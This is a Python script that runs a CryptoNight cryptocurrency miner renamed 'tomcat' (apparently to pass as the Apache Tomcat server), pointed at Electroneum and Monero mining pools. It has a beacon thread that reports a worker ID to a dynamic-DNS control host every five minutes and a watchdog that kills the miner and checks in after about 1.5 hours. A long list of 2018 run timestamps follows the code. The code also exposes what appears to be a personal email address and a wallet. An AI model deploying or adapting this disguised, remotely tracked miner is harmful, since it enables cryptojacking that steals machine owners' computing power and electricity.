import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:55:01.829203
#2018-02-17 16:41:01.918547
#2018-02-17 18:27:06.913536
#2018-02-17 20:16:05.114957
#2018-02-17 22:03:07.091924
#2018-02-17 23:47:05.492800
#2018-02-18 01:38:05.606735
#2018-02-18 03:25:06.628114
#2018-02-18 05:13:06.512561
#2018-02-18 07:05:05.826998
#2018-02-18 08:53:03.602608
#2018-02-18 10:40:07.110408
#2018-02-18 12:25:04.620213
#2018-02-18 14:13:05.465695
#2018-02-18 16:03:06.796071
#2018-02-18 17:52:01.574244
#2018-02-18 19:39:02.227794
#2018-02-18 21:24:07.139476
#2018-02-18 23:13:06.243634
#2018-02-19 00:59:07.416106
#2018-02-19 02:47:01.440344
#2018-02-19 04:33:06.466983
#2018-02-19 06:18:03.634206
#2018-02-19 08:06:01.828617
#2018-02-19 09:56:01.910813
#2018-02-19 11:46:01.367623
#2018-02-19 13:32:06.294294
#2018-02-19 15:21:05.258360
#2018-02-19 17:09:06.728073
#2018-02-19 18:56:03.899784
#2018-02-19 20:43:06.684358
#2018-02-19 22:31:05.582734
#2018-02-20 00:16:01.831974
#2018-02-20 02:03:05.206440
#2018-02-20 03:53:05.020687
#2018-02-20 05:36:05.966491
#2018-02-20 07:21:07.506214
#2018-02-20 09:07:06.502875
#2018-02-20 10:50:09.054098
#2018-02-20 12:37:05.815542
#2018-02-20 14:24:07.805108
#2018-02-20 16:10:09.742628
#2018-02-20 17:57:06.387360
#2018-02-20 19:48:02.123062
#2018-02-20 21:36:07.593961
#2018-02-20 23:18:05.979289
#2018-02-21 01:02:02.154128
#2018-02-21 02:48:07.527245
#2018-02-21 04:37:01.291703
#2018-02-21 06:25:06.219073
#2018-02-21 08:10:10.692493
#2018-02-21 09:57:04.498737
#2018-02-21 11:44:06.960012
#2018-02-21 13:37:01.960833
#2018-02-21 15:21:02.103903
#2018-02-21 17:11:05.435040
#2018-02-21 18:59:04.585672
#2018-02-21 20:48:01.892477
#2018-02-21 22:34:06.726815
#2018-02-22 00:24:06.951801
#2018-02-22 02:12:07.993626
#2018-02-22 03:59:05.129570
#2018-02-22 05:46:04.799266
#2018-02-22 07:31:06.947746
#2018-02-22 09:21:01.756694
#2018-02-22 11:07:04.429639
#2018-02-22 12:53:05.937348
#2018-02-22 14:39:01.396996
#2018-02-22 16:25:09.226053
#2018-02-22 18:12:01.850593
#2018-02-22 20:03:07.892552
#2018-02-22 21:52:05.689562
#2018-02-22 23:39:13.519968
#2018-02-23 01:27:07.428610
#2018-02-23 03:16:06.541369
#2018-02-23 05:04:02.099679
#2018-02-23 06:48:08.167448
#2018-02-23 08:38:05.031696
#2018-02-23 10:53:06.465021
#2018-02-23 12:50:10.906300
#2018-02-23 14:34:09.368781
#2018-02-23 16:25:09.127840
#2018-02-23 18:11:01.360462
#2018-02-23 19:57:08.433010
#2018-02-23 21:40:08.392741
#2018-02-23 23:33:03.852255
#2018-02-24 01:22:06.768296
#2018-02-24 03:12:07.900632
#2018-02-24 04:57:06.385662
#2018-02-24 06:44:05.270864
#2018-02-24 08:32:03.404430
#2018-02-24 10:18:08.335357
#2018-02-24 12:13:07.360638
#2018-02-24 14:01:01.968854
#2018-02-24 15:51:01.947174
#2018-02-24 17:42:08.355937
#2018-02-24 19:27:05.870745
#2018-02-24 21:17:05.819173
#2018-02-24 23:55:05.745738
#2018-02-25 03:11:07.615880
#2018-02-25 06:53:01.856337